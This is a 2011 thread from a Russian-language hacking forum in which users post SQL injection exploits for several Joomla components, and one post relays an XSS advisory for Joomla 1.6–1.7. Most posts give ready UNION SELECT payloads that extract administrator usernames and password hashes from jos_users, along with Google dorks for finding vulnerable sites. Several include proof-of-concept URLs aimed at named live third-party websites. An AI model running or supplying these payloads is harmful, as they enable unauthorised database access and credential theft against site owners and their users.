ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
27.07.2011, 00:27
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709
Репутация:
1
|
|
Joomla com_hitexam SQL-Inj
Что?? Моя любимая тема на второй позиции??? Не порядок)
Дата: 26,07,2011 16:00
Продукт: Joomla component com_hitexam, скачать _http://www.jomexperts.com/download/doc_details/5-hitexam.html?tmpl=component
Уязвимость: SQL-Inj
Автор: z0mbyak
Тип: удалённая
Опасность: 7 (так как это не прямая заливка и возможность закрыться сторонними фильтрами, например sweb)
Описание: Уязвимость существует из-за недостаточной фильтрации входящих данных:
PHP код:
function getLevels($id){
$db = $this->getDBO();
$sql = "select l.level,l.description,l.id as l_id,s.name,s.id from #__exam_levels as l, #__exam_ques_bank as q,#__exam_subjects as s where q.lvl_id=l.id and s.id=q.sub_id and q.published=1 and q.sub_id=$id";
$db->setQuery($sql);
$results = $db->loadObjectList();
return $results;
}
Эксплоит:
_http://www.e-v-r.ru/index.php?option=com_hitexam&task=levels&id=-1+union+select+group_concat%28username,0x3a,passwo rd,0x3a,usertype%29,2,3,4,5+from+jos_users+where+u sertype=%27Super%20Administrator%27--&Itemid=66&font-size=larger
_http://www.mira15.ru/index.php?option=com_hitexam&task=levels&id=-1+union+select+group_concat%28username,0x3a,passwo rd,0x3a,usertype%29,2,3,4,5+from+jos_users+where+u sertype=%27Super%20Administrator%27--&Itemid=66&font-size=larger
dork: inurl:"index.php?option=com_hitexam"
Для устранения уязвимости, нужно просто должным образом фильтровать входящие данные)
P.S. Извини Dark, не удержался, я вообще щедрый)))
|
|
|
01.08.2011, 10:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
9121
Репутация:
1
|
|
Joomla Component (com_obSuggest) Local File Inclusion Vulnerability
[CODE]
Code:
) ) ) ( ( ( ( ( ) )
( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /(
)\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\())
((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ | |_ _|| \| | |/ /
\ V / (_) || (_ |\ V / / _ \ | (__ / _ \ | /| |) | _|| / |__ | | | .` | '
|
|
|
|
02.08.2011, 12:30
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709
Репутация:
1
|
|
Joomla com_adagency SQl-Inj
#Продукт: com_adagency
#Тип уязвимости: SQL-Inj
#Автор: z0mbyak
Exploit: /index.php?option=com_adagency&controller=adagencyP ackages&task=preview&tmpl=component&no_html=1&cid=-108+/*!union*/+/*!select*/+1,2,version()--
PoC:
http://www.charliesheens-korner.com/index.php?option=com_adagency&controller=adagencyP ackages&task=preview&tmpl=component&no_html=1&cid=-108+/*!union*/+/*!select*/+1,2,version%28%29--
http://joomla15.ijoomlademo.com/index.php?option=com_adagency&controller=adagencyP ackages&task=preview&tmpl=component&no_html=0&cid=-108+/*!union*/+/*!select*/+1,2,version%28%29--
Специально для forum.antichat.ru и rdot.org/forum/
|
|
|
|
02.08.2011, 12:53
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709
Репутация:
1
|
|
Joomla com_ag_vodmatvil SQl-Inj
#Продукт: com_ag_vodmatvil
#Тип: SQL-Inj
#Автор: z0mbyak
#exploit: /index.php?option=com_ag_vodmatvil&controller=categ ories&task=category&cid=-1+union+select+1,group_concat(username,0x3a,passwo rd,0x3a,usertype),3+from+jos_users--&Itemid=20
PoC:
http://tube.by/index.php?option=com_ag_vodmatvil&controller=categ ories&task=category&cid=-1+union+select+1,group_concat%28username,0x3a,pass word,0x3a,usertype%29,3+from+jos_users--&Itemid=20
http://vod.solo.by/index.php?option=com_ag_vodmatvil&controller=categ ories&task=category&cid=-1+union+select+1,group_concat%28username,0x3a,pass word,0x3a,usertype%29,3+from+jos_users--&Itemid=20
P.S. Вот, блин, мне делать нефиг)
Специально для forum.antichat.ru и rdot.org/forum/
|
|
|
|
04.08.2011, 09:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
9121
Репутация:
1
|
|
Joomla Component (com_jdirectory) SQL Injection Vulnerability
Код:
Code:
=====================================================================
.__ .__ __ .__ .___
____ ___ _________ | | ____ |__|/ |_ |__| __| _/
_/ __ \\ \/ /\____ \| | / _ \| \ __\ ______ | |/ __ |
\ ___/ > > |_( ) || | /_____/ | / /_/ |
\___ >__/\_ \| __/|____/\____/|__||__| |__\____ |
\/ \/|__| \/
Exploit-ID is the Exploit Information Disclosure
Web : exploit-id.com
e-mail : root[at]exploit-id[dot]com
#########################################
I'm Caddy-Dz, member of Exploit-Id
#########################################
======================================================================
####
# Exploit Title: Joomla Component com_jdirectory SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia[at]hotmail.com | Caddy-Dz[at]exploit-id.com
# Website: www.exploit-id.com
# Google Dork: inurl:/component/option,com_jdirectory
# Category:: Webapps
# Tested on: [Windows 7 Edition Intégral- French]
# Vendor: http://www.joomace.net/downloads/acesef/extensions/jdirectory-acesef
####
[*] ExpLo!T :
http://www.site.com/component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0
http://www.site.com/component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0 # Inject Here
####
[+] Peace From Algeria
####
=================================**Algerians Hackers**=======================================|
# Greets To : |
KedAns-Dz , Kalashinkov3 & **All Algerians Hackers** , jos_ali_joe , Z190T , |
All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (dis9.com) , (exploit-db.com) |
All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , |
RmZ ...others |
============================================================================================ |
|
|
|
|
10.08.2011, 08:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
9121
Репутация:
1
|
|
[B][COLOR="DarkGreen"][SIZE="2"]TNR Enhanced Joomla Search
|
|
|
|
11.08.2011, 17:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
4100
Репутация:
74
|
|
Joomla Fastball component[SQL Injection]
Dork : inurl:"option=com_fastball"
About 1,370,000 results
exploit:
Код:
Code:
http://j15/index.php?option=com_fastball&league=123+union+select+1,2,concat_ws(0x3a,username,passw ord),4,5,6,7,8,9,10,11+from+jos_users--
Веселитесь...
|
|
|
|
16.08.2011, 10:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
30555
Репутация:
85
|
|
Множественные уязвимости вида "Межсайтовый скриптинг" в Joomla всех версийот 1.6.x до 1.7.0 RC
Сообщение от None
List: bugtraq
Subject: Joomla! 1.7.0-RC and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities
From: YGN Ethical Hacker Group
Date: 2011-07-22 3:16:57
Message-ID: CAPYM6VyqAzsUA_qV2n4q9N8dvuZZWadn2us9aZTH08udvQm89 A () mail ! gmail ! com
[Download message RAW]
Joomla! 1.7.0-RC and lower | Multiple Cross Site Scripting (XSS)
Vulnerabilities
1. OVERVIEW
Joomla! 1.7.0-RC and versions of 1.6.x are vulnerable to multiple
Cross Site Scripting issues.
2. BACKGROUND
Joomla is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets. It comprises a
modelтАУviewтАУcontroller (MVC) Web application framework that can also be
used independently.
Joomla is written in PHP, uses object-oriented programming (OOP)
techniques and software design patterns, stores data in a MySQL
database, and includes features such as page caching, RSS feeds,
printable versions of pages, news flashes, blogs, polls, search, and
support for language internationalization.
3. VULNERABILITY DESCRIPTION
Several parameters (searchword, Request URI) in Joomla! Core
components are not properly sanitized upon submission to the
/index.php url, which allows attacker to conduct Cross Site Scripting
attack. This may allow an attacker to create a specially crafted URL
that would execute arbitrary script code in a victim's browser.
4. VERSION AFFECTED
1.7.0-RC and all versions of 1.6.x
5. PROOF-OF-CONCEPT/EXPLOIT
component: com_search, parameter: searchword (Browser: IE, Konqueror)
================================================== ===================
N.B. Our previous reported issue (1.6.3) of "searchword" parameter XSS
was not fixed completely.
[REQUEST]
POST /joomla164_noseo/index.php HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: MSIE 8.0
Connection: close
Referer: http://localhost/joomla164_noseo/
Content-Type: application/x-www-form-urlencoded
Content-Length: 456
task=search&Itemid=435&searchword=Search';onunload =function(){x=confirm(String.fromCha \
rCode(89,111,117,39,118,101,32,103,111,116,32,97,3 2,109,101,115,115,97,103,101,32,102, \
114,111,109,32,65,100,109,105,110,105,115,116,114, 97,116,111,114,33,10,68,111,32,121,1 \
11,117,32,119,97,110,116,32,116,111,32,103,111,32, 116,111,32,73,110,98,111,120,63));al \
ert(String.fromCharCode(89,111,117,39,118,101,32,1 03,111,116,32,88,83,83,33));};//xsss \
ssssssss&option=com_search [/REQUEST]
XSS in Request URI
====================
File: ./includes/application.php
Line: 176, 181
Code: $document->setBase(JURI::current()); // instead of
$document->setBase(htmlspecialchars(JURI::current()));
http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-com \
ponent/new-feed-categories/'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/content-compon \
ent/article-category-list/24-joomla'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/search-compone \
nt/search/'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/contact-compon \
ent/contact-categories/'">alert(/XSS/)
http://localhost/joomla164/index.php/site-map/contacts/'">alert(/XSS/)
http://localhost/joomla164/index.php/component/banners/click/3'">alert(/XSS/)
http://localhost/joomla164/index.php/fruit-encyclopedia/'">alert(/XSS/)
http://localhost/joomla164/index.php/fruit-encyclopedia/38-a'">alert(/XSS/)
http://localhost/joomla164/index.php/fruit-encyclopedia/39-b'">alert(/XSS/)
http://localhost/joomla164/index.php/fruit-encyclopedia/57-t'">alert(/XSS/)
http://localhost/joomla164/index.php/growers/23-happy-orange-orchard'">alert(/ \
XSS/)
http://localhost/joomla164/index.php/image-gallery/animals/25-koala'">alert(/X \
SS/)
http://localhost/joomla164/index.php/image-gallery/scenery/64-blue-mountain-rain-fores \
t'">alert(/XSS/)
http://localhost/joomla164/index.php/image-gallery/scenery/65-ormiston-pound'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/contact-compon \
ent/contact-categories/34-park-site/'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/contact-compon \
ent/contact-categories/34-park-site/2-webmaster'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/contact-compon \
ent/contact-categories/35-shop-site/'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/contact-compon \
ent/contact-categories/35-shop-site/8-shop-address'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/content-compon \
ent/archived-articles/9-uncategorised'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/content-compon \
ent/archived-articles/9-uncategorised/'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/content-compon \
ent/archived-articles/9-uncategorised/67-whats-new-in-15'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/content-compon \
ent/article-categories/26-park-site'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/content-compon \
ent/article-categories/29-fruit-shop-site'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/content-compon \
ent/article-category-list/20-extensions'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/content-compon \
ent/article-category-list/24-joomla'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-com \
ponent/news-feed-category/'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-com \
ponent/news-feed-category/1-joomla-announcements'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-com \
ponent/news-feed-category/2-new-joomla-extensions'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-com \
ponent/news-feed-category/3-joomla-security-news'">alert(/XSS/)
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++
6. IMPACT
Attackers can compromise currently logged-in user/administrator
session and impersonate arbitrary user actions available under
/administrator/ functions.
7. SOLUTION
The development of Joomla! 1.6.x has been ceased; there will be no
fixed version for 1.6.x.
Upgrade to Joomla! 1.7.0-stable or higher.
8. VENDOR
Joomla! Developer Team
http://www.joomla.org
9. CREDIT
This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.
10. DISCLOSURE TIME-LINE
2011-07-02: notified vendor
2011-07-19: patched version, 1.7.0, released
2011-07-22: vulnerability disclosed
11. REFERENCES
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.5]_cross_site_scripting(X \
SS) Previous Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.3]_cross_site_scripting(X \
SS) http://yehg.net/lab/#advisories.joomla
Vendor Advisory URL:
http://developer.joomla.org/security/news/357-20110701-xss-vulnerability.html
#yehg [2011-07-22]
Источник: http://marc.info/?l=bugtraq&m=131160497113679&w=2
|
|
|
|
23.08.2011, 14:59
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709
Репутация:
1
|
|
Joomla com_hbstopdestinations SQL-inj
Joomla com_hbstopdestinations SQL-inj vuln
Этот компоненты специально для отелей, не очень популярен...
Exploit:
index.php?option=com_hbstopdestinations&task=detai ls&h_id=-50+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7 ,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10, 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4, 5,6,7,8,9,10,1,2,3,4,5,6,7,8,9--&cId=&sId=&cityId=&f_date=&t_date=
POC:
http://zambiatourismnews.com/index.php?option=com_hbstopdestinations&task=detai ls&h_id=-50+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7 ,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10, 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4, 5,6,7,8,9,10,1,2,3,4,5,6,7,8,9--&cId=&sId=&cityId=&f_date=&t_date=
Код не покажу, так как не залился)
|
|
|
|
24.08.2011, 18:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
4100
Репутация:
74
|
|
com_tweetportsSQL-Injection (1.5 && 1.6)
tweetports.helper.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
function[/COLOR][COLOR="#0000BB"]existLocationName[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]=&[/COLOR][COLOR="#0000BB"]JFactory[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getDBO[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT id FROM #__tweetports_geocodes WHERE location = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setQuery[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$addressID[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]loadResult[/COLOR][COLOR="#007700"]();
return[/COLOR][COLOR="#0000BB"]$addressID[/COLOR][COLOR="#007700"];
}
...
function[/COLOR][COLOR="#0000BB"]existAddress[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$address[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]=&[/COLOR][COLOR="#0000BB"]JFactory[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getDBO[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT id FROM #__tweetports_geocodes WHERE address = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$address[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setQuery[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$addressID[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]loadResult[/COLOR][COLOR="#007700"]();
return[/COLOR][COLOR="#0000BB"]$addressID[/COLOR][COLOR="#007700"];
}
....
[/COLOR][/COLOR]
locations.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]class[/COLOR][COLOR="#0000BB"]TweetportsModelLocations[/COLOR][COLOR="#007700"]extends[/COLOR][COLOR="#0000BB"]JModel
[/COLOR][COLOR="#007700"]{
....
function[/COLOR][COLOR="#0000BB"]saveLocation[/COLOR][COLOR="#007700"]() {
if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Submit'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Submit'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]"Save"[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$nameID[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]TweetportsHelper[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]existLocationName[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'locationname'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$addressID[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]TweetportsHelper[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]existAddress[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'locationaddress'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$hashtagID[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]TweetportsHelper[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]existHashtag[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'locationhashtag'[/COLOR][COLOR="#007700"]]);
if ([/COLOR][COLOR="#0000BB"]$addressID[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$notice[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"Address already exists! Please try another port."[/COLOR][COLOR="#007700"];
} else if ([/COLOR][COLOR="#0000BB"]$hashtagID[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$notice[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"Hashtag already exists! Please try another Hashtag."[/COLOR][COLOR="#007700"];
} else if ([/COLOR][COLOR="#0000BB"]$nameID[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$notice[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"Location Name already exists! Please try another Hashtag."[/COLOR][COLOR="#007700"];
} else {
[/COLOR][COLOR="#0000BB"]TweetportsHelper[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]addLocation[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'locationname'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'locationaddress'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'locationhashtag'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$notice[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]JText[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"LOCATION THANKS"[/COLOR][COLOR="#007700"]);
}
}
return[/COLOR][COLOR="#0000BB"]$notice[/COLOR][COLOR="#007700"];
}
....
}
[/COLOR][/COLOR]
exploit:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR]
[/COLOR]
com_mediaideamultilist sql-inj (1.5&1.6) [p.s. мож уже начнем версии двига писать(под которые компонент или модуль заточен)?!]
vulner files dbfuncs.php & standardlist & helpers.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]не влезли[/COLOR][/COLOR]
зато exploit безотказен
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]index[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]option[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]com_mediaideamultilist[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]controller[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]helpers[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]format[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]raw[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]task[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]getField[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]tarId[/COLOR][COLOR="#007700"]=
-[/COLOR][COLOR="#0000BB"]666[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]UNION[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]SELECT[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]7[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#0000BB"]group_concat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]username[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0x3a[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]password[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]SEPARATOR[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]0x3c62723e[/COLOR][COLOR="#007700"]),
[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]11[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]14[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]15[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]16[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]from[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]jos_users[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]where[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#0000BB"]usertype[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0x53757065722041646D696E6973747261746F72[/COLOR][COLOR="#007700"]--[/COLOR][/COLOR]
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид